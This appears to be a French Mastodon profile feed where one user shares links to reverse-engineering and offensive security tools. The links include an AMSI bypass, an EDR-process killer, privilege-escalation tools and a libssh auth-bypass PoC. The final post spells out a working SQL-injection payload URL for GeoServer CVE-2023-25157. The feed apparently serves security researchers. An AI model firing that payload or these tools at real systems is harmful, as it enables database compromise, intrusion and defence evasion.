Plus récents
몾 Artemis

ida-rust-untangler

An IDA plugin for demangling Rust function names

github.com/cxiao/ida-rust-unta

0
몾 Artemis

GetLolDrivers.ps

raw.githubusercontent.com/gtwo

0
몾 Artemis

IDA kmdf

This # python plugin helps the reverser & offers some confort at the beginning of an analysis

github.com/thalium/ida_kmdf

0
몾 Artemis

aioSMB v0.4.6

Fully asynchronous SMB fuzzer written in pure

github.com/skelsec/aiosmb

0
몾 Artemis

gmsad

gmsad manages Active Directory group Managed Service Account on Linux

Given the keytab of an account which has the ability to retrieve the secret of a gMSA, gmsad creates a keytab for the service account and renew it when necessary. It can execute an arbitrary command just after renewing the keytab.

github.com/cea-sec/gmsad

0
몾 Artemis

OpenWEC

A free & open source (GPLv3) implementation of a Windows Event Collector server running on GNU/Linux & written in Rust.

github.com/cea-sec/openwec

0
몾 Artemis

Blink v1.0

Blink is a brand new unprivileged userspace virtual machine that can emulate x86-64-linux binaries on any POSIX platform.

github.com/jart/blink/releases

0
몾 Artemis a partagé
yaracroft

🛠 yara-ttd

Use YARA rules on Time Traveil Debugging traces. The idea behind yara-ttd is to use the trace files recorded by TTD with yara itself to defeat packers

github.com/airbus-cert/yara-tt

0
몾 Artemis

HyperDbg v3.0

Native debugging tool

github.com/HyperDbg/HyperDbg/r

0
몾 Artemis

osslsigncode

OpenSSL based Authenticode signing PE/MSI/Java CAB files

github.com/mtrojnar/osslsignco

  • Cracking PKCS#12 passwords

tij.me/blog/finding-and-utilis

0
몾 Artemis

Demo 38:15 - 41:18

youtube.com/watch?v=YnxGW8Fvqv

raw.githubusercontent.com/yard

0
몾 Artemis

PE with spoofed sections

An undocumented trick to embed executable code within (what appears to be) a read-only PE section. The proof-of-concepts described above involve appending the payload to the end of the NT headers, but it is also possible to embed executable code within the headers.

Nice, x86matthew. Ping @siri_urz

secret.club/2023/06/05/spoof-p

  • sample : https://secret.club/assets/pe_section_spoof/pe_section_spoof.zip
0
몾 Artemis

Abusing Microsoft SQL via ADSI

tarlogic.com/blog/linked-serve

0
몾 Artemis

CVE-2023-2283 PoC

Public key auth bypass in libssh

github.com/github/securitylab/

0
몾 Artemis

fakeAmsiDll.cpp

Simply return `S_OK / AMSI_RESULT_CLEAǸ for every command

gist.github.com/eversinc33/beb

0
몾 Artemis

ShellSweep.ps1

unit42.paloaltonetworks.com/th

0
몾 Artemis

🛠 nbutools

Tools for offensive security of NetBackup infrastructures

github.com/airbus-seclab/nbuto

0
몾 Artemis

Terminator

Reproducing Spyboy technique to terminate all EDR/XDR/AVs processes

github.com/ZeroMemoryEx/Termin

0
몾 Artemis

DavRelayUp

An universal no-fix local privilege escalation in domain-joined Windows workstations where LDAP signing is not enforced

github.com/Dec0ne/DavRelayUp

0
몾 Artemis

PoC CVE-2023-25157 by @parzel

/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=osm:osm_places&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+current_user%29+AS+INTEGER%29%29+--+%27%29+%3D+true
0
Plus anciens
nanao

Comme le soleil, les machines ne se couchent jamais.

Ressources

Développeurs

Qu’est-ce que Mastodon ?

nanao.cybtex.fr

Davantage…